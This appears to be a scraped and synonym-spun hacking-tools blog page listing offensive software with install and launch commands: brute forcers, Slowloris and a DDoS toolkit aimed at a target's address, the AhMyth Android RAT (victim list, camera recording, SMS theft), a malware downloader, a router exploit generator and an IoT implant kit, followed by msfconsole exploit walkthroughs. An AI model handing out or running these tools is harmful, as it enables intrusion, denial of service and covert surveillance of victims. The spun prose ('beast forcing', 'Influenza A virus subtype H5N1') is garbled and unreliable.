Web Globe

About BruteDum 1.0
   BruteDum is a SSH, FTP, Telnet, PostgreSQL, RDP, VNC beast forcing tool alongside Hydra, Medusa and Ncrack. BruteDum tin operate alongside whatsoever Linux distros if they accept Python 3.

Features of BruteDum:
 * SSH, FTP, Telnet, PostgreSQL, RDP, VNC alongside Hydra (recommended)
 * SSH, FTP, Telnet, PostgreSQL, RDP, VNC alongside Medusa
 * SSH, FTP, Telnet, PostgreSQL, RDP, VNC alongside Ncrack
 * Scan victim's ports alongside Nmap

Install as well as run on Linux
   You accept to install Python iii first:
    * Install Python iii on Arch Linux as well as its distros: sudo pacman -S python3
    * Install Python iii on Debian as well as its distros: sudo apt install python3

   You accept to install Hydra, Medusa, Nmap as well as Ncrack too:
    * On Arch Linux as well as its distros: sudo pacman -S nmap hydra medusa ncrack
    * On Debian as well as its distros: sudo apt install nmap hydra medusa ncrack

   And then, download BruteDum-master.zip, extract, opened upwardly Terminal on its folder as well as instruct inward the command: python3 brutedum.py

Screenshots of BruteDum

Menu of tools

Scanning victim's ports alongside Nmap

Ready to beast force

Brute forcefulness has done

Video present of BruteDum

Thank you lot GitHackTools (myself) for programming this tool 🙂

Contact to coder
 * Website: GitHackTools.blogspot.com
 * Twitter: @SecureGF
 * Facebook: @GitHackTools
 * Google Plus: It's gone.

To-do list: Create wordlist alongside crunch.

About Tool-X

   Tool-X is a Kali Linux hacking Tool installer. Tool-X developed for Termux too other Android terminals. With Tool-X you lot tin install about 263 hacking tools inwards Termux app too other linux based distributions. Now Tool-X is available for Ubuntu, Debian...

How to operate Tool-X?
 * Type 0: To install all tools.
 * Type 1: to sow all available tools too type the release of a tool which you lot desire to install.
 * Type 2: to demonstrate tools category.
 * Type 3: for install operating arrangement inwards termux
 * Type 4: if you lot desire to update Tool-X.
 * Type 5: if you lot know About us.
 * Type x: for exit.

Install too run Tool-X
   You accept to install Python ii first: sudo apt instal python2 python2-pip
   And then, download Tool-X-master.zip, extract, opened upwardly its folder amongst Terminal too hold upwardly into the command: sudo python .Tool-X.py



Read more: Katoolin: Install pentest tools from Kali Linux on GNU/Linux

About Malicious: Malicious - Influenza A virus subtype H5N1 Malware downloading tool written inward Python 2.

Install Malicious on Linux
   You accept to install Python two as well as Ruby first:
    * On Arch Linux as well as its distros: sudo pacman -S python2 ruby
    * On Debian as well as its distros: sudo apt install python2 ruby

   After that, install lolcat with gem: sudo precious rock install lolcat

   And then, download Malicious-master.zip, extract as well as opened upward Terminal on its folder as well as larn into command: pip2 install -r requirements.txt && python2 malicious.py

What is Slowloris?
   Slowloris is basically an HTTP Denial of Service assail that affects threaded servers. It industrial plant similar this:
    * We outset making lots of HTTP requests.
    * We post headers periodically (every fifteen seconds) to overstep away along the connections open.
    * We never closed the connectedness unless the server does so. If the server closes a connection, nosotros exercise a novel i overstep away along doing the same thing.

   This exhausts the servers thread puddle together with the server can't response to other people.

SOCKS5 proxy back upwardly on SlowLoris
   However, if y'all innovation on using the -x pick inward social club to purpose a SOCKS5 proxy for connecting instead of a straight connectedness over your IP address, y'all volition holler for to install the PySocks library (or whatever other implementation of the socks library) every bit well. PySocks is a fork from SocksiPy yesteryear GitHub user @Anorov together with tin easily last installed yesteryear adding PySocks to the pip command higher upwardly or running it in i lawsuit to a greater extent than similar so: sudo pip3 install PySocks

   You tin together with thus purpose the -x pick to activate SOCKS5 back upwardly together with the --proxy-host together with --proxy-port pick to specify the SOCKS5 proxy host together with its port, if they are unlike from the measure 127.0.0.1:8080.

Install together with run SlowLoris
sudo pip3 install slowloris
slowloris [target's address]
   or
git clone https://github.com/gkbrk/slowloris
cd slowloris

python3 slowloris.py [target's address]

Configuration options: It is possible to modification the demeanor of slowloris amongst command-line arguments.

License of SlowLoris: The code is licensed nether the MIT License.

About ZAmbIE
   ZAmbIE is a DoS in addition to DDoS attacking toolkit made past times Lunatic2 written inwards Python ii for Recon, Information Gathering in addition to it has a collection of DoS in addition to DDoS Attacks.

Install in addition to Run ZambIE for Debian
git clone https://github.com/zanyarjamal/zambie
cd zambie
bash Installer.sh
python zambie.py

Screenshots of ZAmbIE

About AhMyth-Android-RAT
   AhMyth-Android-RAT consists of 2 parts:
    * Server side: desktop application based on electron framework (control panel).
    * Client side: android application (backdoor).

Install together with run AhMyth-Android-RAT from source code
   You convey to install Electron Framwork (to start the app) and Java (to generate APK backdoor) first
      Install Electron
    * For Windows: Download here. And extract it!
    * For Debian-based: Follow this tutorial. And together with hence hold out inwards the command: sudo npm install electron.

      Install Java
    * For Windows: Download together with install here.
    * For Debian-based: Follow this tutorial.

   And then, opened upwards Terminal together with hold out inwards these command:
git clone https://github.com/AhMyth/AhMyth-Android-RAT
cd AhMyth-Android-RAT/AhMyth-Server
npm start

Install together with run AhMyth-Android-RAT from binariy files
   You involve install Java to generate APK backdoor
    * Install Java for Windows: Download together with install here.
    * Install Java for Debian-based: Follow this tutorial.

   And then, download together with install .DEB (for Debian-based) or .EXE file (for Windows) from Releases · AhMyth/AhMyth-Android-RAT · GitHub.

   And then, opened upwards Terminal together with hold out inwards sudo ahmyth to start AhMyth-Android-RAT.

Screenshots of AhMyth-Android-RAT

A listing of victims

Recording amongst forepart camera

File Manager

Take SMS List

Get Call logs

Video about AhMyth-Android-RAT

Donate to writer of AhMyth-Android-RAT
   Twitter account: @AhMythDev
   You tin forcefulness out donate to writer yesteryear Bitcoin to this address: 1EVwLuwmbsEuej7qJnNquFeQJLsgd2b8Lq. Or scan this QR code!

Created yesteryear GithackTools

About dnsmap
   Author: pagvac
   License: GNU General Public License v2.0

   dnsmap was originally released dorsum inwards 2006 together with was inspired yesteryear the fictional even out “The Thief No One Saw” yesteryear Paul Craig, which tin last flora inwards the volume “Stealing the Network – How to 0wn the Box”.

   dnsmap is mainly meant to last used yesteryear pentesters during the information gathering/enumeration stage of infrastructure safety assessments. During the enumeration stage, the safety consultant would typically notice the target company’s IP netblocks, domain names, telephone numbers...

   Subdomain brute-forcing is around other technique that should last used inwards the enumeration stage, every bit it’s peculiarly useful when other domain enumeration techniques such every bit zone transfers don’t work.

Tools included inwards the dnsmap
   dnsmap – DNS domain advert animal forcing tool   dnsmap-bulk.sh – DNS domain advert animal forcing tool

dnsmap usage example
   dnsmap: Scan a website similar example.com amongst a wordlist similar /usr/share/wordlists/dnsmap.txt:
    dnsmap-bulk: Create a file containing domain names similar domains.txt to scan together with overstep it to dnsmap-bulk.sh

Install dnsmap

   Note: dnsmap is already installed on Kali Linux, Parrot Security OS, BlackArch, DracOS together with other pentesting OS.

Screenshots of dnsmap

About InfoSploit 1.0:

   InfoSploit is a uncomplicated Python two script to Information Gathering activity.
   Tested On: Linux together with Android Phone (Termux No root).

Install together with piece of occupation InfoSploit
Features of InfoSploit

Video close InfoSploit

About writer of InfoSploit
 * Github account: CybernetiX-S3C
 * Facebook fanpage: @Cyber.S3C.Professional
 * Youtube channel: CybernetiX

About Router-Exploit-Shovel
   Router-Exploit-Shovel is an automated application generation for Stack Overflow types on Wireless Routers.

   Router exploits shovel is an automated application generation tool for stack overflow types on wireless routers. The tool implements the cardinal functions of exploits, it tin suit to the length of the information padding on the stack, generate the ROP chain, generate the encoded shellcode, as well as lastly get together them into a consummate gear upward on code. The user alone needs to attach the gear upward on code to the overflow place of the POC to consummate the Exploit of the remote code execution.

   The tool supports MIPSel as well as MIPSeb.Run on Ubuntu 16.04 64bit.

Router-Exploit-Shovel's Installation
   Open your Terminal as well as locomote into these commands:
Usage

   Example: python3 Router_Exploit_Shovel.py -b test_binaries/mipseb-httpd -l test_binaries/libuClibc-0.9.30.so -o 0x00478584

Router-Exploit-Shovel's screenshot
Code structure

ROP chain generation
   This tool uses blueprint to generate ROP chains. Extract patterns from mutual ROP exploitation procedure. Use regex matching to detect available gadgets to produce total upward chain strings. Base64 encoding is to avoid duplicate graphic symbol escapes. For example:

Attackblocks
   You tin instruct out attackblocks generated inward results/attackBlocks.txt. Such as:

You mightiness similar these similar tools:

• eXpliot - Internet Of Things Exploitation Framework
• RouterSploit: Exploitation Framework for Embedded Devices

About APT2 - An Automated Penetration Testing Toolkit
   This tool volition perform an NMap scan, or import the results of a scan from Nexpose, Nessus, or NMap. The processesd results volition last used to launch exploit together with enumeration modules according to the configurable Safe Level together with enumerated service information.

   All module results are stored on localhost together with are purpose of APT2's Knowledge Base (KB). The KB is accessible from inside the application together with allows the user to persuasion the harvested results of an exploit module.

   NOTE: APT2 is currently solely tested on Linux based OSes. If you lot tin confirm that it industrial plant on other OSes, delight say it to the author.

APT2 Installation
   You convey to install Metasploit Framework first:
    * For Debian's distros:
sudo roll https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall && sudo ./msfinstall
    * For Arch Linux's distros: sudo pacman -S metasploit


Current External Program/Script Dependencies
   To brand amount utilization of all of APT2's modules, the next external dependencies should last install on your system: convert, dirb, hydra, java, jexboss, john, ldapsearch, msfconsole, nmap, nmblookup, phantomjs, responder, rpcclient, secretsdump.py, smbclient, snmpwalk, sslscan, xwd.

APT2 Configuration (Optional)
   APT2 uses the default.cfg file inwards the misc directory. Edit this file to configure APT2 to run every bit you lot desire.

   Metasploit RPC API (Metasploit): APT2 tin utuilize your host's Metasploit RPC interface (MSGRPC). Additional Information tin last flora here: RPC API

   NMAP: Configure NMAP scan settings to include the target, scan type, scan port range, together with scan flags. These settings tin last configured piece the programme is running.

   Threading: Configure the set out of the threads APT2 volition use.

How to run APT2?
   With no Options: python2 apt2.py
   With Configuration File: python2 apt2.py -C <config.txt>
   Import Nexpose, Nessus, or NMap XML: python2 apt2.py -f <nmap.xml>
   Specify Target Range to Start: python2 apt2.py --target 192.168.1.0/24

Safe Level on APT2: Safe levels dot how prophylactic a module is to run againsts a target. The scale runs from 1 to v amongst v beingness the safest. The default configuration uses a Safe Level of four exactly tin last gear upward amongst the -s or --safelevel ascendance business flags.

APT2 handle menu

APT2 usage example

APT2's modules

Video almost APT2

About IoT-Implant-Toolkit
   IoT-Implant-Toolkit is a framework of useful tools for malware implantation query of IoT devices. It is a toolkit consisted of essential software tools on firmware modification, series port debugging, software analysis together with stable spy clients. With an easy-to-use together with extensible shell-like environment, IoT-Implant-Toolkit is a one-stop-shop toolkit simplifies complex physical care for of IoT malware implantation.

   In MarvelTeamLab's research, they bring succcessfully implanted Trojans inwards 8 devices including smart speakers, cameras, driving recorders together with mobile translators amongst IoT-Implant-Toolkit.

    Influenza A virus subtype H5N1 exhibit GIF below:

IoT-Implant-Toolkit's Installation
   Your must install ffmpeg together with sox first:

• For Debian-based distro users: sudo apt install sox ffmpeg
• For Arch Linux-based user: sudo pacman -S sox ffmpeg

What is the MSFconsole?
   The msfconsole is likely the most pop interface to the Metasploit Framework (MSF). It provides an “all-in-one” centralized console together with allows you lot efficient access to virtually all of the options available inwards the MSF. MSFconsole may seem intimidating at first, but ane time you lot larn the syntax of the commands you lot volition larn to appreciate the mightiness of utilizing this interface.

Benefits to Using MSFconsole:
 * It is the solely supported agency to access most of the features inside Metasploit.
 * Provides a console-based interface to the framework.
 * Contains the most features together with is the most stable MSF interface.
 * Full readline support, tabbing, together with dominance completion.
 * Execution of external commands inwards msfconsole is possible:

Open MSFconsole
   The MSFconsole is launched yesteryear exactly running msfconsole from the dominance line. MSFconsole is located inwards the /usr/share/metasploit-framework/msfconsole directory.

   The -q selection removes the launch banner yesteryear starting msfconsole in placidity mode.

How to Use the msfconsole Command Prompt
   You tin overstep -h to msfconsole to encounter the other usage options available to you.

   Entering help or a ? ane time inwards the msf dominance prompt volition display a listing of available commands along alongside a description of what they are used for.

Tab Completion on MSFconsole
   The MSFconsole is designed to hold out fast to work together with ane of the features that helps this goal is tab completion. With the broad array of modules available, it tin hold out hard to recollect the exact yell together with path of the especial module you lot wishing to brand work of. As alongside most other shells, entering what you lot know together with pressing ‘Tab’ volition acquaint you lot alongside a listing of options available to you lot or auto-complete the string if at that spot is solely ane option. Tab completion depends on the ruby readline extension together with nearly every dominance inwards the console supports tab completion.

 * use exploit/windows/dce
 * use .*netapi.*
 * set LHOST
 * show
 * set TARGET
 * set PAYLOAD windows/shell/
 * exp

MSFconsole Core Commands
   back: Once you lot convey finished working alongside a especial module, or if you lot inadvertently pick out the incorrect module, you lot tin number the back command to motion out of the electrical current context. This, nonetheless is non required. Just equally you lot tin inwards commercial routers, you lot tin switch modules from inside other modules. As a reminder, variables volition solely bear over if they are laid upwardly globally.

msf auxiliary(ms09_001_write) > back
msf >

   banner: Simply displays a randomly selected banner.
   check: There aren’t many exploits that back upwardly it, but at that spot is also a check selection that volition banking concern check to encounter if a target is vulnerable to a especial exploit instead of truly exploiting it.
msf exploit(ms08_067_netapi) > demo options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    172.16.194.134   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The piping yell to work (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > check

[*] Verifying vulnerable status... (path: 0x0000005a)
[*] System is non vulnerable (status: 0x00000000)
[*] The target is non exploitable.
msf  exploit(ms08_067_netapi) >

   color: You tin enable or disable if the output you lot acquire through the msfconsole volition incorporate colors.

msf > color
Usage: color >'true'|'false'|'auto'>

Enable or disable color output.

   connect: There is a miniature Netcat clone built into the msfconsole that supports SSL, proxies, pivoting, together with file transfers. By issuing the connect dominance alongside an IP address together with port number, you lot tin connect to a remote host from inside msfconsole the same equally you lot would alongside Netcat or Telnet.

msf > connect 192.168.1.1 23
[*] Connected to 192.168.1.1:23
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)
DD-WRT login:

   You tin encounter all the additional options yesteryear issuing connect -h.

   edit: The edit dominance volition edit the electrical current module alongside $VISUAL or $EDITOR. By default, this volition opened upwardly the electrical current module inwards Vim.

msf exploit(ms10_061_spoolss) > edit
[*] Launching /usr/bin/vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms10_061_spoolss.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/windows_error'

class Metasploit3 > Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  def initialize(info = {})

   exit: The exit dominance volition exactly leave of absence msfconsole.
msf exploit(ms10_061_spoolss) > exit
root@kali: #

   grep: The grep dominance is similar to Linux grep. It matches a given pattern from the output of unopen to other msfconsole command. The next is an illustration of using grep to gibe output containing the string “http” from a search for modules containing the string “oracle”.


   info: The info dominance volition render detailed information almost a especial module including all options, targets, together with other information. Be for sure to ever read the module description prior to using it equally unopen to may convey un-desired effects.

      The info dominance also provides the next information:
    * The writer together with licensing information.
    * Vulnerability references (ie: CVE, BID, etc).
    * Any payload restrictions the module may have.

   irb: Running the irb dominance volition drib you lot into a alive Ruby interpreter musical rhythm out where you lot tin number commands together with create Metasploit scripts on the fly. This characteristic is also really useful for agreement the internals of the Framework.

msf > irb
[*] Starting IRB shell...

>> puts "Hello, metasploit!"
Hello, metasploit!
=> nil
>> Framework::Version
=> "4.8.2-2014022601"

   jobs: Jobs are modules that are running inwards the background. The jobs dominance provides the mightiness to listing together with sack these jobs.

   kill: The kill dominance volition kill whatsoever running jobs when supplied alongside the chore id.

msf exploit(ms10_002_aurora) > kill 0
Stopping job: 0...

[*] Server stopped.

   load: The load dominance loads a plugin from Metasploit’s plugin directory. Arguments are passed equally key=val on the shell.

msf > load
Usage: load  [var=val var=val ...]

Loads a plugin from the supplied path.  If path is non absolute, get-go looks
in the user's plugin directory (/root/.msf4/plugins) then
in the framework root plugin directory (/usr/share/metasploit-framework/plugins).
The optional var=val options are custom parameters that tin hold out passed to plugins.

msf > charge pcap_log
[*] PcapLog plugin loaded.
[*] Successfully loaded plugin: pcap_log

   loadpath: The loadpath dominance volition charge a third-part module tree for the path thence you lot tin indicate Metasploit at your 0-day exploits, encoders, payloads, etc.
msf > loadpath /home/secret/modules

Loaded 0 modules.

   unload: Conversely, the unload dominance unloads a previously loaded plugin together with removes whatsoever extended commands.
msf > unload pcap_log
Unloading plugin pcap_log...unloaded.

   resource: The resource dominance runs resources (batch) files that tin hold out loaded through msfconsole.

msf > resource
Usage: resources path1 [path2 ...]

Run the commands stored inwards the supplied files.  Resource files may also contain
ruby code between  tags.

See also: makerc

   Some attacks, such equally Karmetasploit, work resources files to run a laid upwardly of commands inwards a karma.rc file to create an attack. Later, nosotros volition verbalise over how, exterior of Karmetasploit, that tin hold out really useful.

msf > resources karma.rc
[*] Processing karma.rc for ERB directives.
resource (karma.rc_.txt)> db_connect postgres:toor@127.0.0.1/msfbook
resource (karma.rc_.txt)> work auxiliary/server/browser_autopwn
...snip...

Batch files tin greatly speed upwardly testing together with evolution times equally good equally allow the user to automate many tasks. Besides loading a batch file from inside msfconsole, they tin also hold out passed at startup using the -r flag. The uncomplicated illustration below creates a batch file to display the Metasploit version number at startup.

root@kali: # echo version > version.rc
root@kali: # msfconsole -r version.rc

Frustrated alongside proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- type 'go_pro' to launch it now.

       =[ metasploit v4.8.2-2014021901 [core:4.8 api:1.0] ]
+ -- --=[ 1265 exploits - 695 auxiliary - 202 postal service ]
+ -- --=[ 330 payloads - 32 encoders - 8 nops      ]

[*] Processing version.rc for ERB directives.
resource (version.rc)> version
Framework: 4.8.2-2014022601
Console  : 4.8.2-2014022601.15168
msf >

   route: The route dominance inwards Metasploit allows you lot to road sockets through a session or ‘comm’, providing basic pivoting capabilities. To add together a route, you lot overstep the target subnet together with network mask followed yesteryear the session (comm) number.

   search: The msfconsole includes an extensive regular-expression based search functionality. If you lot convey a full general persuasion of what you lot are looking for, you lot tin search for it via search. In the output below, a search is beingness made for EternalBlue. The search business office volition locate this string inside the module names, descriptions, references, etc. Note the naming convention for Metasploit modules uses underscores versus hyphens.

   help: You tin farther refine your searches yesteryear using the built-in keyword system.